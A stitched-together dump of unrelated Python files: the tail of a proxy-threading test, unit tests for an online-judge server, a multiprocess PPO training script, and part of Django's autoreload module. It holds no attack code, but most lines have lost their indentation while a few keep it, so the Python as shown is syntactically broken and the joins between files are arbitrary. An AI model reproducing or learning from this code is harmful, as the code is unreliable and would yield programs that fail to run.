self.assertEqual("Initial State", sub_object.get_attribute())
                # Update its state and check that the change stuck
sub_object.set_attribute("Outer Thread State")
self.assertEqual("Outer Thread State", sub_object.get_attribute())
# Now, erroneously pass this Proxy object to another thread
def thread_method() -> None:
# Call again in background thread. In this instance this raises an error but other side effects could occur depending on the type of the object being proxied
with self.assertRaisesRegex(AttributeError, "AutoRemoteObjectReference' object has no attribute '_attribute'"):
sub_object.get_attribute()
# Start the thread which now erroneously has a Proxy object
thread = Thread(target=thread_method)
thread.start()
thread.join()
# Ensure outer object hasn't changed
self.assertEqual("Outer Thread State", sub_object.get_attribute())
# Ensure that the expected warnings were shown
warning_logs = log_context.pop_captured_records().with_levels_in({LogLevel.warn}).get_lines(timestamp=False, level=False)
self.assertEqual(2, len(warning_logs)) # 2 warnings, as they were raised for both "get_attribute" and "_attribute"
def expected_log_message(attribute: str) -> str:
return f"No remote methods or attributes found for AutoRemoteObjectReference for <class 'tests.runnable.proxy.proxy_test_helpers.SubObjectImpl'> " \
f"when attempting to retrieve '{attribute}' - has it been incorrectly shared across threads?"
self.assertEqual(expected_log_message("get_attribute"), warning_logs[0])
self.assertEqual(expected_log_message("_attribute"), warning_logs[1])
def get_all_items_from_buffer(buffer: Buffer) -> List:
buffer_items = []
with buffer.subscribe(None) as sub:
while True:
try:
sleep(0.01)
sub.call_events(lambda v: buffer_items.append(v))
except queue.Empty:
break
return buffer_items
CallLog = Dict[str, Tuple[Any, Any]]
class MethodCallRecorder(ScopedAttributesCompatibilityMixin):
_call_log: CallLog = manually_managed("_call_log", ThreadAction.SHARED, ProcessAction.NOT_ALLOWED)
def __init__(self, methods_to_record: List[str]) -> None:
super().__init__()
self._methods_to_record = methods_to_record
self._call_log = {}
def __getattribute__(self, item: str) -> Any:
methods_to_record = super().__getattribute__("_methods_to_record")
if item in methods_to_record:
return CallRecorder(self._call_log, item)
return super().__getattribute__(item)
class CallRecorder:
def __init__(self, recording_dict: CallLog, name: str):
self._recording_dict = recording_dict
self._name = name
def __call__(self, *args: Any, **kwargs: Any) -> Any:
self._recording_dict[self._name] = (args, kwargs)
class PartialProxyThatImplementsMethodWithReturnValue(BaseRemoteObjectReference[HasMethodThatReturnsValue], HasMethodThatReturnsValue, ABC):
def returns_value(self, a: str, b: int) -> str:
return self._remote_method(self._wrapped_instance.returns_value).call(a, b)
class InterfaceWithOneMissingDecorator(ABC):
@abstractmethod
def decorated_method(self) -> None:
raise NotImplementedError
def undecorated_method(self) -> None:
raise NotImplementedError("Ooops, undecorated_method wasn't decorated")
class ExtendedInterfaceWithMissingDecorator(InterfaceWithOneMissingDecorator, ABC):
@abstractmethod
def decorated_extended(self) -> None:
raise NotImplementedError()
def undecorated_extended(self) -> None:
raise NotImplementedError("Ooops, undecorated_extended wasn't decorated")
|
tests.py
|
from oj.server import judge, main
import threading
import time
import subprocess
import unittest
import xmlrpc.client
PORT = 8000
class ProductTestCase(unittest.TestCase):
def test_CE(self):
self.assertEqual(judge('', [], 0), 'CE')
def test_AC(self):
self.assertEqual(judge('#include <cstdio>\nint main() {\n int a, b;\n scanf("%d %d", &a, &b);\n printf("%d", a / b);\n return 0;\n}\n', [('1 1', '1')])[0], ['AC'])
def test_WA(self):
self.assertEqual(judge('#include <cstdio>\nint main() {\n int a, b;\n scanf("%d %d", &a, &b);\n printf("%d", a / b);\n return 0;\n}\n', [('2 2', '4')])[0], ['WA'])
def test_TLE(self):
self.assertEqual(judge('#include <cstdio>\nint main() {\n int a, b;\n scanf("%d %d", &a, &b);\n printf("%d", a / b);\n while (true)\n ;\n return 0;\n}\n', [('1 1', '1')], .1), (['TLE'], [100]))
def test_RE(self):
self.assertEqual(judge('#include <cstdio>\nint main() {\n int a, b;\n scanf("%d %d", &a, &b);\n printf("%d", a / b);\n return 0;\n}\n', [('1 0', '0')])[0], ['RE'])
def test_case(self):
self.assertEqual(judge('#include <cstdio>\nint main() {\n int a, b;\n scanf("%d %d", &a, &b);\n printf("%d", a / b);\n return 0;\n}\n', [('1 1', '1'), ('2 2', '4'), ('1 0', '0')])[0], ['AC', 'WA', 'RE'])
def test_threading(self):
t = time.time()
judge('#include <cstdio>\nint main() {\n int a, b;\n scanf("%d %d", &a, &b);\n printf("%d", a / b);\n while (true)\n ;\n return 0;\n}\n', [('1 1', '1')] * 10, .1)
self.assertAlmostEqual(time.time() - t, .1, 0)
def test_server(self):
threading.Thread(target=main, kwargs={'port': PORT, 'quiet': True}, daemon=True).start()
time.sleep(.1)
self.assertEqual(xmlrpc.client.ServerProxy('http://127.0.0.1:' + str(PORT)).judge('#include <cstdio>\nint main() {\n int a, b;\n scanf("%d %d", &a, &b);\n printf("%d", a / b);\n return 0;\n}\n', [('1 1', '1')])[0], ['AC'])
def test_with_pylint(self):
pylint = subprocess.run(['pylint', '-sn', 'oj.server'], stdout=subprocess.PIPE).stdout.decode()
self.assertFalse(pylint, '\n' + pylint)
if __name__ == '__main__':
unittest.main()
|
ppo_continuous_multiprocess.py
|
'''
Multi-processing for PPO continuous version 1
'''
import math
import random
import gym
import numpy as np
import torch
torch.multiprocessing.set_start_method('forkserver', force=True)  # critical to make multiprocessing work (notably with CUDA tensors)
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
from torch.distributions import Normal, MultivariateNormal
from IPython.display import clear_output
import matplotlib.pyplot as plt
from matplotlib import animation
from IPython.display import display
from reacher import Reacher
import argparse
import time
import torch.multiprocessing as mp
from torch.multiprocessing import Process
from multiprocessing import Manager  # Process intentionally comes from torch.multiprocessing above
from multiprocessing.managers import BaseManager
import threading as td
GPU = True
device_idx = 0
if GPU:
device = torch.device("cuda:" + str(device_idx) if torch.cuda.is_available() else "cpu")
else:
device = torch.device("cpu")
print(device)
parser = argparse.ArgumentParser(description='Train or test neural net motor controller.')
parser.add_argument('--train', dest='train', action='store_true', default=False)
parser.add_argument('--test', dest='test', action='store_true', default=False)
args = parser.parse_args()
##################### hyper parameters ####################
ENV_NAME = 'Pendulum-v0' # environment name
RANDOMSEED = 2 # random seed
EP_MAX = 1000 # total number of episodes for training
EP_LEN = 200 # total number of steps for each episode
GAMMA = 0.9 # reward discount
A_LR = 0.0001 # learning rate for actor
C_LR = 0.0002 # learning rate for critic
BATCH = 128 # update batchsize
A_UPDATE_STEPS = 10 # actor update steps
C_UPDATE_STEPS = 10 # critic update steps
EPS = 1e-8 # numerical residual
MODEL_PATH = 'model/ppo_multi'
NUM_WORKERS=2 # or: mp.cpu_count()
ACTION_RANGE = 1.  # amplitude of the policy output; keep at 1. when the environment's actions are normalized
METHOD = [
dict(name='kl_pen', kl_target=0.01, lam=0.5), # KL penalty
dict(name='clip', epsilon=0.2), # Clipped surrogate objective, find this is better
][0] # choose the method for optimization
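# For reference (standard PPO objectives; a_train() below implements both):
#   'kl_pen': maximize E[ r_t(theta) * A_t - lam * KL(pi_old || pi) ], with lam adapted towards kl_target
#   'clip'  : maximize E[ min( r_t(theta) * A_t, clip(r_t(theta), 1 - eps, 1 + eps) * A_t ) ]
# where r_t(theta) = pi_theta(a_t | s_t) / pi_theta_old(a_t | s_t).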
############################### PPO ####################################
class AddBias(nn.Module):
def __init__(self, bias):
super(AddBias, self).__init__()
self._bias = nn.Parameter(bias.unsqueeze(1))
def forward(self, x):
if x.dim() == 2:
bias = self._bias.t().view(1, -1)
else:
bias = self._bias.t().view(1, -1, 1, 1)
return x + bias
class ValueNetwork(nn.Module):
def __init__(self, state_dim, hidden_dim, init_w=3e-3):
super(ValueNetwork, self).__init__()
self.linear1 = nn.Linear(state_dim, hidden_dim)
# self.linear2 = nn.Linear(hidden_dim, hidden_dim)
# self.linear3 = nn.Linear(hidden_dim, hidden_dim)
self.linear4 = nn.Linear(hidden_dim, 1)
# weights initialization
self.linear4.weight.data.uniform_(-init_w, init_w)
self.linear4.bias.data.uniform_(-init_w, init_w)
def forward(self, state):
x = F.relu(self.linear1(state))
# x = F.relu(self.linear2(x))
# x = F.relu(self.linear3(x))
x = self.linear4(x)
return x
class PolicyNetwork(nn.Module):
def __init__(self, num_inputs, num_actions, hidden_dim, action_range=1., init_w=3e-3, log_std_min=-20, log_std_max=2):
super(PolicyNetwork, self).__init__()
self.log_std_min = log_std_min
self.log_std_max = log_std_max
self.linear1 = nn.Linear(num_inputs, hidden_dim)
self.linear2 = nn.Linear(hidden_dim, hidden_dim)
# self.linear3 = nn.Linear(hidden_dim, hidden_dim)
# self.linear4 = nn.Linear(hidden_dim, hidden_dim)
self.mean_linear = nn.Linear(hidden_dim, num_actions)
# implementation 1
# self.log_std_linear = nn.Linear(hidden_dim, num_actions)
# # implementation 2: not dependent on latent features, reference:https://github.com/ikostrikov/pytorch-a2c-ppo-acktr-gail/blob/master/a2c_ppo_acktr/distributions.py
self.log_std = AddBias(torch.zeros(num_actions))
self.num_actions = num_actions
self.action_range = action_range
def forward(self, state):
x = F.relu(self.linear1(state))
x = F.relu(self.linear2(x))
# x = F.relu(self.linear3(x))
# x = F.relu(self.linear4(x))
        mean = self.action_range * torch.tanh(self.mean_linear(x))  # F.tanh is deprecated in favour of torch.tanh
# implementation 1
# log_std = self.log_std_linear(x)
# log_std = torch.clamp(log_std, self.log_std_min, self.log_std_max)
# implementation 2
zeros = torch.zeros(mean.size())
if state.is_cuda:
zeros = zeros.cuda()
log_std = self.log_std(zeros)
return mean, log_std
def get_action(self, state, deterministic=False):
state = torch.FloatTensor(state).unsqueeze(0).to(device)
mean, log_std = self.forward(state)
std = log_std.exp()
normal = Normal(0, 1)
z = normal.sample()
action = mean+std*z
action = torch.clamp(action, -self.action_range, self.action_range)
return action.squeeze(0)
def sample_action(self,):
a=torch.FloatTensor(self.num_actions).uniform_(-1, 1)
return a.numpy()
class NormalizedActions(gym.ActionWrapper):
def _action(self, action):
low = self.action_space.low
high = self.action_space.high
action = low + (action + 1.0) * 0.5 * (high - low)
action = np.clip(action, low, high)
return action
def _reverse_action(self, action):
low = self.action_space.low
high = self.action_space.high
action = 2 * (action - low) / (high - low) - 1
action = np.clip(action, low, high)
return action
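# Worked example (illustrative): for Pendulum-v0 the torque range is low=-2, high=2, so a policy
# output of 0.5 maps through _action() to -2 + (0.5 + 1) * 0.5 * 4 = 1.0, and _reverse_action()
# maps 1.0 back to 2 * (1.0 - (-2)) / 4 - 1 = 0.5.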
class PPO(object):
'''
PPO class
'''
def __init__(self, state_dim, action_dim, hidden_dim=512, a_lr=3e-4, c_lr=3e-4):
self.actor = PolicyNetwork(state_dim, action_dim, hidden_dim, ACTION_RANGE).to(device)
self.actor_old = PolicyNetwork(state_dim, action_dim, hidden_dim, ACTION_RANGE).to(device)
self.critic = ValueNetwork(state_dim, hidden_dim).to(device)
self.actor_optimizer = optim.Adam(self.actor.parameters(), lr=a_lr)
self.critic_optimizer = optim.Adam(self.critic.parameters(), lr=c_lr)
print(self.actor, self.critic)
def a_train(self, s, a, adv):
'''
Update policy network
:param s: state
:param a: action
:param adv: advantage
:return:
'''
mu, log_std = self.actor(s)
pi = Normal(mu, torch.exp(log_std))
mu_old, log_std_old = self.actor_old(s)
oldpi = Normal(mu_old, torch.exp(log_std_old))
# ratio = torch.exp(pi.log_prob(a) - oldpi.log_prob(a)) # sometimes give nan
ratio = torch.exp(pi.log_prob(a)) / (torch.exp(oldpi.log_prob(a)) + EPS)
surr = ratio * adv
if METHOD['name'] == 'kl_pen':
lam = METHOD['lam']
kl = torch.distributions.kl.kl_divergence(oldpi, pi)
kl_mean = kl.mean()
aloss = -((surr - lam * kl).mean())
else: # clipping method, find this is better
aloss = -torch.mean(torch.min(surr, torch.clamp(ratio, 1. - METHOD['epsilon'], 1. + METHOD['epsilon']) * adv))
self.actor_optimizer.zero_grad()
aloss.backward()
self.actor_optimizer.step()
if METHOD['name'] == 'kl_pen':
return kl_mean
def update_old_pi(self):
'''
Update old policy parameter
:return: None
'''
for p, oldp in zip(self.actor.parameters(), self.actor_old.parameters()):
oldp.data.copy_(p)
    def c_train(self, cumulative_r, s):
        '''
        Update critic (value) network
        :param cumulative_r: cumulative reward
        :param s: state
        :return: None
        '''
v = self.critic(s)
advantage = cumulative_r - v
closs = (advantage**2).mean()
self.critic_optimizer.zero_grad()
closs.backward()
self.critic_optimizer.step()
def cal_adv(self, s, cumulative_r):
'''
Calculate advantage
:param s: state
:param cumulative_r: cumulative reward
:return: advantage
'''
advantage = cumulative_r - self.critic(s)
return advantage.detach()
def update(self, s, a, r):
'''
Update parameter with the constraint of KL divergent
:param s: state
:param a: act
:param r: reward
:return: None
'''
s = torch.FloatTensor(s).to(device)
a = torch.FloatTensor(a).to(device)
r = torch.FloatTensor(r).to(device)
self.update_old_pi()
adv = self.cal_adv(s, r)
# adv = (adv - adv.mean())/(adv.std()+1e-6) # sometimes helpful
# update actor
if METHOD['name'] == 'kl_pen':
for _ in range(A_UPDATE_STEPS):
kl = self.a_train(s, a, adv)
                if kl > 4 * METHOD['kl_target']:  # this is in Google's paper
break
if kl < METHOD['kl_target'] / 1.5: # adaptive lambda, this is in OpenAI's paper
METHOD['lam'] /= 2
elif kl > METHOD['kl_target'] * 1.5:
METHOD['lam'] *= 2
METHOD['lam'] = np.clip(
METHOD['lam'], 1e-4, 10
) # sometimes explode, this clipping is MorvanZhou's solution
else: # clipping method, find this is better (OpenAI's paper)
for _ in range(A_UPDATE_STEPS):
self.a_train(s, a, adv)
# update critic
for _ in range(C_UPDATE_STEPS):
self.c_train(r, s)
def choose_action(self, s):
'''
Choose action
:param s: state
:return: clipped act
'''
a = self.actor.get_action(s)
return a.detach().cpu().numpy()
def get_v(self, s):
'''
Compute value
:param s: state
:return: value
'''
s = s.astype(np.float32)
if s.ndim < 2: s = s[np.newaxis, :]
s = torch.FloatTensor(s).to(device)
return self.critic(s).squeeze(0).detach().cpu().numpy()
def save_model(self, path):
torch.save(self.actor.state_dict(), path+'_actor')
torch.save(self.critic.state_dict(), path+'_critic')
torch.save(self.actor_old.state_dict(), path+'_actor_old')
def load_model(self, path):
self.actor.load_state_dict(torch.load(path+'_actor'))
self.critic.load_state_dict(torch.load(path+'_critic'))
self.actor_old.load_state_dict(torch.load(path+'_actor_old'))
self.actor.eval()
self.critic.eval()
self.actor_old.eval()
def ShareParameters(adamoptim):
''' share parameters of Adamoptimizers for multiprocessing '''
for group in adamoptim.param_groups:
for p in group['params']:
state = adamoptim.state[p]
# initialize: have to initialize here, or else cannot find
state['step'] = 0
state['exp_avg'] = torch.zeros_like(p.data)
state['exp_avg_sq'] = torch.zeros_like(p.data)
# share in memory
state['exp_avg'].share_memory_()
state['exp_avg_sq'].share_memory_()
def plot(rewards):
clear_output(True)
plt.figure(figsize=(10,5))
plt.plot(rewards)
plt.savefig('ppo_multi.png')
# plt.show()
plt.clf()
def worker(id, ppo, rewards_queue):
env = gym.make(ENV_NAME).unwrapped
state_dim = env.observation_space.shape[0]
action_dim = env.action_space.shape[0]
all_ep_r = []
for ep in range(EP_MAX):
s = env.reset()
buffer={
'state':[],
'action':[],
'reward':[]
}
ep_r = 0
t0 = time.time()
for t in range(EP_LEN): # in one episode
# env.render()
a = ppo.choose_action(s)
s_, r, done, _ = env.step(a)
buffer['state'].append(s)
buffer['action'].append(a)
# buffer['reward'].append(r)
            buffer['reward'].append((r + 8) / 8)  # normalize reward; found to be useful sometimes. In my experience the 'kl_pen' version benefits from it, while the 'clip' version works without this normalization
s = s_
ep_r += r
# update ppo
if (t + 1) % BATCH == 0 or t == EP_LEN - 1 or done:
if done:
v_s_=0
else:
v_s_ = ppo.get_v(s_)[0]
discounted_r = []
for r in buffer['reward'][::-1]:
v_s_ = r + GAMMA * v_s_
discounted_r.append(v_s_)
discounted_r.reverse()
bs, ba, br = np.vstack(buffer['state']), np.vstack(buffer['action']), np.array(discounted_r)[:, np.newaxis]
buffer['state'], buffer['action'], buffer['reward'] = [], [], []
ppo.update(bs, ba, br)
if done:
break
if ep == 0:
all_ep_r.append(ep_r)
else:
all_ep_r.append(all_ep_r[-1] * 0.9 + ep_r * 0.1)
if ep%50==0:
ppo.save_model(MODEL_PATH)
print(
'Episode: {}/{} | Episode Reward: {:.4f} | Running Time: {:.4f}'.format(
ep, EP_MAX, ep_r,
time.time() - t0
)
)
rewards_queue.put(ep_r)
ppo.save_model(MODEL_PATH)
env.close()
def main():
# reproducible
# env.seed(RANDOMSEED)
np.random.seed(RANDOMSEED)
torch.manual_seed(RANDOMSEED)
env = NormalizedActions(gym.make(ENV_NAME).unwrapped)
state_dim = env.observation_space.shape[0]
action_dim = env.action_space.shape[0]
ppo = PPO(state_dim, action_dim, hidden_dim=128)
if args.train:
ppo.actor.share_memory()
ppo.actor_old.share_memory()
ppo.critic.share_memory()
ShareParameters(ppo.actor_optimizer)
ShareParameters(ppo.critic_optimizer)
        rewards_queue = mp.Queue()  # used to collect episode rewards from all processes and plot the curve
processes=[]
rewards=[]
for i in range(NUM_WORKERS):
            process = Process(target=worker, args=(i, ppo, rewards_queue))  # args contain both shared and non-shared objects
            process.daemon = True  # all worker processes are terminated when the main process exits
processes.append(process)
[p.start() for p in processes]
        while True:  # keep getting the episode reward from the queue
r = rewards_queue.get()
if r is not None:
if len(rewards) == 0:
rewards.append(r)
else:
rewards.append(rewards[-1] * 0.9 + r * 0.1)
else:
break
if len(rewards)%20==0 and len(rewards)>0:
plot(rewards)
[p.join() for p in processes] # finished at the same time
ppo.save_model(MODEL_PATH)
if args.test:
ppo.load_model(MODEL_PATH)
while True:
s = env.reset()
for i in range(EP_LEN):
env.render()
s, r, done, _ = env.step(ppo.choose_action(s))
if done:
break
if __name__ == '__main__':
main()
|
autoreload.py
|
"""
auto reload的设计思路,主进程和子进程,主进程一直监控子进程,子进程退出后,主进程启动一个新的子进程
"""
import functools
import itertools
import logging
import os
import signal
import subprocess
import sys
import threading
import time
import traceback
import weakref
from collections import defaultdict
from pathlib import Path
from types import ModuleType
from zipimport import zipimporter
from django.apps import apps
from django.core.signals import request_finished
from django.dispatch import Signal
from django.utils.functional import cached_property
from django.utils.version import get_version_tuple
autoreload_started = Signal()
file_changed = Signal(providing_args=['file_path', 'kind'])
DJANGO_AUTORELOAD_ENV = 'RUN_MAIN'
logger = logging.getLogger('django.utils.autoreload')
# If an error is raised while importing a file, it's not placed in sys.modules.
# This means that any future modifications aren't caught. Keep a list of these
# file paths to allow watching them in the future.
_error_files = []
_exception = None
try:
import termios
except ImportError:
termios = None
try:
import pywatchman
except ImportError:
pywatchman = None
def check_errors(fn):
@functools.wraps(fn)
def wrapper(*args, **kwargs):
global _exception
try:
fn(*args, **kwargs)
except Exception:
_exception = sys.exc_info()
et, ev, tb = _exception
if getattr(ev, 'filename', None) is None:
# get the filename from the last item in the stack
filename = traceback.extract_tb(tb)[-1][0]
else:
filename = ev.filename
if filename not in _error_files:
_error_files.append(filename)
raise
return wrapper
def raise_last_exception():
global _exception
if _exception is not None:
raise _exception[1]
def ensure_echo_on():
"""
Ensure that echo mode is enabled. Some tools such as PDB disable
it which causes usability issues after reload.
"""
if not termios or not sys.stdin.isatty():
return
attr_list = termios.tcgetattr(sys.stdin)
if not attr_list[3] & termios.ECHO:
attr_list[3] |= termios.ECHO
if hasattr(signal, 'SIGTTOU'):
old_handler = signal.signal(signal.SIGTTOU, signal.SIG_IGN)
else:
old_handler = None
termios.tcsetattr(sys.stdin, termios.TCSANOW, attr_list)
if old_handler is not None:
signal.signal(signal.SIGTTOU, old_handler)
def iter_all_python_module_files():
# This is a hot path during reloading. Create a stable sorted list of
# modules based on the module name and pass it to iter_modules_and_files().
# This ensures cached results are returned in the usual case that modules
# aren't loaded on the fly.
keys = sorted(sys.modules)
modules = tuple(m for m in map(sys.modules.__getitem__, keys) if not isinstance(m, weakref.ProxyTypes))
return iter_modules_and_files(modules, frozenset(_error_files))
@functools.lru_cache(maxsize=1)
def iter_modules_and_files(modules, extra_files):
"""Iterate through all modules needed to be watched."""
sys_file_paths = []
for module in modules:
# During debugging (with PyDev) the 'typing.io' and 'typing.re' objects
# are added to sys.modules, however they are types not modules and so
# cause issues here.
if not isinstance(module, ModuleType):
continue
if module.__name__ == '__main__':
# __main__ (usually manage.py) doesn't always have a __spec__ set.
# Handle this by falling back to using __file__, resolved below.
# See https://docs.python.org/reference/import.html#main-spec
            # __file__ may not exist, e.g. when running under the ipdb debugger.
if hasattr(module, '__file__'):
sys_file_paths.append(module.__file__)
continue
if getattr(module, '__spec__', None) is None:
continue
spec = module.__spec__
# Modules could be loaded from places without a concrete location. If
# this is the case, skip them.
if spec.has_location:
origin = spec.loader.archive if isinstance(spec.loader, zipimporter) else spec.origin
sys_file_paths.append(origin)
results = set()
for filename in itertools.chain(sys_file_paths, extra_files):
if not filename:
continue
path = Path(filename)
try:
resolved_path = path.resolve(strict=True).absolute()
except FileNotFoundError:
# The module could have been removed, don't fail loudly if this
# is the case.
continue
results.add(resolved_path)
return frozenset(results)
@functools.lru_cache(maxsize=1)
def common_roots(paths):
"""
Return a tuple of common roots that are shared between the given paths.
File system watchers operate on directories and aren't cheap to create.
Try to find the minimum set of directories to watch that encompass all of
the files that need to be watched.
"""
# Inspired from Werkzeug:
# https://github.com/pallets/werkzeug/blob/7477be2853df70a022d9613e765581b9411c3c39/werkzeug/_reloader.py
# Create a sorted list of the path components, longest first.
path_parts = sorted([x.parts for x in paths], key=len, reverse=True)
tree = {}
for chunks in path_parts:
node = tree
# Add each part of the path to the tree.
for chunk in chunks:
node = node.setdefault(chunk, {})
# Clear the last leaf in the tree.
node.clear()
# Turn the tree into a list of Path instances.
def _walk(node, path):
for prefix, child in node.items():
yield from _walk(child, path + (prefix,))
if not node:
yield Path(*path)
return tuple(_walk(tree, ()))
def sys_path_directories():
"""
Yield absolute directories from sys.path, ignoring entries that don't
exist.
"""
for path in sys.path:
path = Path(path)
try:
resolved_path = path.resolve(strict=True).absolute()
except FileNotFoundError:
continue
# If the path is a file (like a zip file), watch the parent directory.
if resolved_path.is_file():
yield resolved_path.parent
else:
yield resolved_path
def get_child_arguments():
"""
Return the executable. This contains a workaround for Windows if the
executable is reported to not have the .exe extension which can cause bugs
on reloading.
"""
import django.__main__
args = [sys.executable] + ['-W%s' % o for o in sys.warnoptions]
if sys.argv[0] == django.__main__.__file__:
# The server was started with `python -m django runserver`.
args += ['-m', 'django']
args += sys.argv[1:]
else:
args += sys.argv
return args
def trigger_reload(filename):
logger.info('%s changed, reloading.', filename)
sys.exit(3)
def restart_with_reloader():
new_environ = {**os.environ, DJANGO_AUTORELOAD_ENV: 'true'}
args = get_child_arguments()
while True:
exit_code = subprocess.call(args, env=new_environ, close_fds=False)
if exit_code != 3:
return exit_code
class BaseReloader:
def __init__(self):
self.extra_files = set()
self.directory_globs = defaultdict(set)
self._stop_condition = threading.Event()
def watch_dir(self, path, glob):
path = Path(path)
if not path.is_absolute():
raise ValueError('%s must be absolute.' % path)
logger.debug('Watching dir %s with glob %s.', path, glob)
self.directory_globs[path].add(glob)
def watch_file(self, path):
path = Path(path)
if not path.is_absolute():
raise ValueError('%s must be absolute.' % path)
logger.debug('Watching file %s.', path)
self.extra_files.add(path)
def watched_files(self, include_globs=True):
"""
Yield all files that need to be watched, including module files and
files within globs.
"""
yield from iter_all_python_module_files()
yield from self.extra_files
if include_globs:
for directory, patterns in self.directory_globs.items():
for pattern in patterns:
yield from directory.glob(pattern)
def wait_for_apps_ready(self, app_reg, django_main_thread):
"""
Wait until Django reports that the apps have been loaded. If the given
thread has terminated before the apps are ready, then a SyntaxError or
other non-recoverable error has been raised. In that case, stop waiting
for the apps_ready event and continue processing.
Return True if the thread is alive and the ready event has been
triggered, or False if the thread is terminated while waiting for the
event.
"""
while django_main_thread.is_alive():
if app_reg.ready_event.wait(timeout=0.1):
return True
else:
logger.debug('Main Django thread has terminated before apps are ready.')
return False
def run(self, django_main_thread):
logger.debug('Waiting for apps ready_event.')
self.wait_for_apps_ready(apps, django_main_thread)
from django.urls import get_resolver
# Prevent a race condition where URL modules aren't loaded when the
# reloader starts by accessing the urlconf_module property.
try:
get_resolver().urlconf_module
except Exception:
# Loading the urlconf can result in errors during development.
# If this occurs then swallow the error and continue.
pass
logger.debug('Apps ready_event triggered. Sending autoreload_started signal.')
autoreload_started.send(sender=self)
self.run_loop()
def run_loop(self):
ticker = self.tick()
while not self.should_stop:
try:
next(ticker)
except StopIteration:
break
self.stop()
def tick(self):
"""
This generator is called in a loop from run_loop. It's important that
the method takes care of pausing or otherwise waiting for a period of
time. This split between run_loop() and tick() is to improve the
testability of the reloader implementations by decoupling the work they
do from the loop.
"""
raise NotImplementedError('subclasses must implement tick().')
@classmethod
def check_availability(cls):
raise NotImplementedError('subclasses must implement check_availability().')
def notify_file_changed(self, path):
results = file_changed.send(sender=self, file_path=path)
logger.debug('%s notified as changed. Signal results: %s.', path, results)
if not any(res[1] for res in results):
trigger_reload(path)
# These are primarily used for testing.
@property
def should_stop(self):
return self._stop_condition.is_set()
def stop(self):
self._stop_condition.set()
class StatReloader(BaseReloader):
SLEEP_TIME = 1 # Check for changes once per second.
def tick(self):
mtimes = {}
while True:
for filepath, mtime in self.snapshot_files():
old_time = mtimes.get(filepath)
mtimes[filepath] = mtime
if old_time is None:
logger.debug('File %s first seen with mtime %s', filepath, mtime)
continue
elif mtime > old_time:
logger.debug('File %s previous mtime: %s, current mtime: %s', filepath, old_time, mtime)
self.notify_file_changed(filepath)
time.sleep(self.SLEEP_TIME)
yield
def snapshot_files(self):
# watched_files may produce duplicate paths if globs overlap.
seen_files = set()
for file in self.watched_files():
if file in seen_files:
continue
try:
mtime = file.stat().st_mtime
except OSError:
# This is thrown when the file does not exist.
continue
seen_files.add(file)
yield file, mtime
@classmethod
def check_availability(cls):
return True
class WatchmanUnavailable(RuntimeError):
pass
class WatchmanReloader(BaseReloader):
def __init__(self):
self.roots = defaultdict(set)
self.processed_request = threading.Event()
self.client_timeout = int(os.environ.get('DJANGO_WATCHMAN_TIMEOUT', 5))
super().__init__()
@cached_property
def client(self):
return pywatchman.client(timeout=self.client_timeout)
def _watch_root(self, root):
# In practice this shouldn't occur, however, it's possible that a
# directory that doesn't exist yet is being watched. If it's outside of
# sys.path then this will end up a new root. How to handle this isn't
# clear: Not adding the root will likely break when subscribing to the
# changes, however, as this is currently an internal API, no files
# will be being watched outside of sys.path. Fixing this by checking
        # inside watch_glob() and watch_dir() is expensive, instead this
        # could fall back to the StatReloader if this case is detected? For
        # now, watching its parent, if possible, is sufficient.
if not root.exists():
if not root.parent.exists():
                logger.warning('Unable to watch root dir %s as neither it nor its parent exists.', root)
return
root = root.parent
result = self.client.query('watch-project', str(root.absolute()))
if 'warning' in result:
logger.warning('Watchman warning: %s', result['warning'])
logger.debug('Watchman watch-project result: %s', result)
return result['watch'], result.get('relative_path')
@functools.lru_cache()
def _get_clock(self, root):
return self.client.query('clock', root)['clock']
def _subscribe(self, directory, name, expression):
root, rel_path = self._watch_root(directory)
query = {
'expression': expression,
'fields': ['name'],
'since': self._get_clock(root),
'dedup_results': True,
}
if rel_path:
query['relative_root'] = rel_path
logger.debug('Issuing watchman subscription %s, for root %s. Query: %s', name, root, query)
self.client.query('subscribe', root, name, query)
def _subscribe_dir(self, directory, filenames):
if not directory.exists():
if not directory.parent.exists():
                logger.warning('Unable to watch directory %s as neither it nor its parent exists.', directory)
return
prefix = 'files-parent-%s' % directory.name
filenames = ['%s/%s' % (directory.name, filename) for filename in filenames]
directory = directory.parent
expression = ['name', filenames, 'wholename']
else:
prefix = 'files'
expression = ['name', filenames]
self._subscribe(directory, '%s:%s' % (prefix, directory), expression)
def _watch_glob(self, directory, patterns):
"""
Watch a directory with a specific glob. If the directory doesn't yet
exist, attempt to watch the parent directory and amend the patterns to
        include this. It's important this method isn't called more than once per
directory when updating all subscriptions. Subsequent calls will
overwrite the named subscription, so it must include all possible glob
expressions.
"""
prefix = 'glob'
if not directory.exists():
if not directory.parent.exists():
                logger.warning('Unable to watch directory %s as neither it nor its parent exists.', directory)
return
prefix = 'glob-parent-%s' % directory.name
patterns = ['%s/%s' % (directory.name, pattern) for pattern in patterns]
directory = directory.parent
expression = ['anyof']
for pattern in patterns:
expression.append(['match', pattern, 'wholename'])
self._subscribe(directory, '%s:%s' % (prefix, directory), expression)
def watched_roots(self, watched_files):
extra_directories = self.directory_globs.keys()
watched_file_dirs = [f.parent for f in watched_files]
sys_paths = list(sys_path_directories())
return frozenset((*extra_directories, *watched_file_dirs, *sys_paths))
def _update_watches(self):
watched_files = list(self.watched_files(include_globs=False))
found_roots = common_roots(self.watched_roots(watched_files))
logger.debug('Watching %s files', len(watched_files))
logger.debug('Found common roots: %s', found_roots)
# Setup initial roots for performance, shortest roots first.
for root in sorted(found_roots):
self._watch_root(root)
for directory, patterns in self.directory_globs.items():
self._watch_glob(directory, patterns)
# Group sorted watched_files by their parent directory.
sorted_files = sorted(watched_files, key=lambda p: p.parent)
for directory, group in itertools.groupby(sorted_files, key=lambda p: p.parent):
# These paths need to be relative to the parent directory.
self._subscribe_dir(directory, [str(p.relative_to(directory)) for p in group])
def update_watches(self):
try:
self._update_watches()
except Exception as ex:
# If the service is still available, raise the original exception.
if self.check_server_status(ex):
raise
def _check_subscription(self, sub):
subscription = self.client.getSubscription(sub)
if not subscription:
return
logger.debug('Watchman subscription %s has results.', sub)
for result in subscription:
# When using watch-project, it's not simple to get the relative
# directory without storing some specific state. Store the full
# path to the directory in the subscription name, prefixed by its
# type (glob, files).
root_directory = Path(result['subscription'].split(':', 1)[1])
logger.debug('Found root directory %s', root_directory)
for file in result.get('files', []):
self.notify_file_changed(root_directory / file)
def request_processed(self, **kwargs):
logger.debug('Request processed. Setting update_watches event.')
self.processed_request.set()
def tick(self):
request_finished.connect(self.request_processed)
self.update_watches()
while True:
if self.processed_request.is_set():
self.update_watches()
